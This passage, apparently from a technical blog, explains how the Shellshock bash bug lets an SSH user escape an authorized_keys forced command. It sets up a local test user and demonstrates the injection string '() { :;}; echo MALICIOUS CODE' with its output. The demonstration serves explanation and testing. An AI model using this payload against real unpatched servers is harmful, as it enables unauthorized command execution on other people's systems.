One example where this can be exploited is on servers with an authorized_keys
forced command. When adding an entry to ~/.ssh/authorized_keys
, you can prefix the line with command="foo"
to force foo
to be run any time that ssh public key is used. With this exploit, if the target user's shell is set to bash
, they can take advantage of the exploit to run things other than the command that they are forced to.
This would probably make more sense in example, so here is an example:
sudo useradd -d /testuser -s /bin/bash testuser
sudo mkdir -p /testuser/.ssh
sudo sh -c "echo command=\\\"echo starting sleep; sleep 1\\\" $(cat ~/.ssh/id_rsa.pub) > /testuser/.ssh/authorized_keys"
sudo chown -R testuser /testuser
Here we set up a user testuser
, that forces any ssh connections using your ssh key to run echo starting sleep; sleep 1
.
We can test this with:
$ ssh testuser@localhost echo something else
starting sleep
Notice how our echo something else
doesn't get run, but the starting sleep
shows that the forced command did run.
Now lets show how this exploit can be used:
$ ssh testuser@localhost '() { :;}; echo MALICIOUS CODE'
MALICIOUS CODE
starting sleep
This works because sshd
sets the SSH_ORIGINAL_COMMAND
environment variable to the command passed. So even though sshd
ran sleep
, and not the command I told it to, because of the exploit, my code still gets run.